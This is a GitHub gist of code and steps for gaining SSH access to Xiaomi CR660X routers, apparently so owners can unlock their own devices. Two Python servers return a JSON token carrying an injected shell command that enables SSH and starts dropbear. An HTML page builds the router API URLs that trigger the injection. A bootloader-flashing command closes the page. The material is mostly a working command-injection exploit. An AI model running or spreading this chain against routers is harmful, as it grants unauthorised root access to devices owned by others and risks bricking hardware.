Skip to content

Instantly share code, notes, and snippets.

@jinyu121

jinyu121/README.md

Created October 5, 2022 02:14
Show Gist options
  • Save jinyu121/342e8113ee9b20cd8bb7d4954a7982f1 to your computer and use it in GitHub Desktop.
Save jinyu121/342e8113ee9b20cd8bb7d4954a7982f1 to your computer and use it in GitHub Desktop.
Download ZIP
Xiaomi CR660X get SSH access
Raw
README.md

Xiaomi CR660X (CR6606/CR6608/CR6609) Get SSH Access

  1. Login to CR660X, open Wi-Fi, disable "merge 2.4G with 5G"
  2. Get another router, open 2.4G Wi-Fi, set LAN ip as 169.254.31.3, disable DHCP, connect LAN with CR660X's LAN
  3. Get a laptop, connect LAN with CR660X's LAN, connect CR660X's 5G Wi-Fi. Set wired IP as 169.254.31.1, run the python script
  4. Login to CR660X's web page, get its IP, and get stok in URL
  5. Open the html page, fill in the IP, stok, SSID, password, and get URLs. Clicks the URLs one by one.
Raw
server_flask.py
from flask import Flask
import json
app = Flask(__name__)
@app.errorhandler(404)
def unlock(foo):
return json.dumps({
"code": 0,
"token": "; nvram set ssh_en=1; nvram commit; sed -i 's/channel=.*/channel=\"debug\"/g' /etc/init.d/dropbear; /etc/init.d/dropbear start;"
}), 200
# Run this file with
# python flask --app server run --host=0.0.0.0 --port 80
Raw
server_http.py
from http.server import BaseHTTPRequestHandler, HTTPServer
import json
class SimpleServer(BaseHTTPRequestHandler):
def do_GET(self):
print("It comes!")
data = {
"code": 0,
"token": "; nvram set ssh_en=1; nvram commit; sed -i 's/channel=.*/channel=\"debug\"/g' /etc/init.d/dropbear; /etc/init.d/dropbear start;"
}
self.send_response(200)
self.end_headers()
self.wfile.write(json.dumps(data).encode())
server_address = ('0.0.0.0', 80)
httpd = HTTPServer(server_address, SimpleServer)
httpd.serve_forever()
# Run this file with
# python server.py
Raw
urls.html
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>xiaomi router SSH access</title>
</head>
<script type="text/javascript">
var prefix = "http://192.168.";
function mergeText() {
var prefix_with_token = prefix + document.getElementById('ip').value + '.1/cgi-bin/luci/;stok=' + document.getElementById('stok').value;
var lnk1 = prefix_with_token + '/api/misystem/extendwifi_connect?ssid=' + document.getElementById('ssid').value + '&password=' + document.getElementById('passwd').value
document.getElementById('link1').innerText = lnk1;
document.getElementById('link1').setAttribute("href", lnk1);
var lnk2 = prefix_with_token + '/api/xqsystem/oneclick_get_remote_token?username=xxx&password=xxx&nonce=xxx';
document.getElementById('link2').innerText = lnk2;
document.getElementById('link2').setAttribute("href", lnk2);
}
</script>
<body>
Token获取页面测试:<a href="http://169.254.31.1/cgi-bin/luci/api/xqsystem/token"
target="_blank">http://169.254.31.1/cgi-bin/luci/api/xqsystem/token</a>
<hr />
小米路由管理地址:192.168.<input type="text" style="width:30px; height:16px;" id="ip" onkeyup="mergeText()" />.1<br />
小米路由的STOK值:<input type="text" id="stok" onkeyup="mergeText()" /><br />
辅助路由的Wi-Fi SSID:<input type="text" id="ssid" onkeyup="mergeText()" /><br />
辅助路由的Wi-Fi密码:<input type="text" id="passwd" onkeyup="mergeText()" /><br />
<hr>
<h2>第一个链接</h2>
<h4><a href="" id="link1" target="_blank">填好自动生成链接<a></h4>
<h2>第二个链接</h2>
<h4><a href="" id="link2" target="_blank">填好自动生成链接</a></h4>
根据SN计算管理密码:<a href="https://miwifi.dev/ssh">https://miwifi.dev/ssh</a>
<hr>
<h2>刷入pb-boot</h2>
<input type="text" name="" id="" style="width: 100%;" value="mtd write /tmp/pb-boot.img Bootloader" />
<h2>重启</h2>
<input type="text" name="" id="" style="width: 100%;" value="reboot" />
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment